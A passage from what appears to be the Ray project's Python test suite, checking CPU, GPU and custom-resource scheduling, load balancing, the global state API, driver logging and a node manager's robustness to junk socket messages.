@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(shutdown_only):
ray.init(num_cpus=1)
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
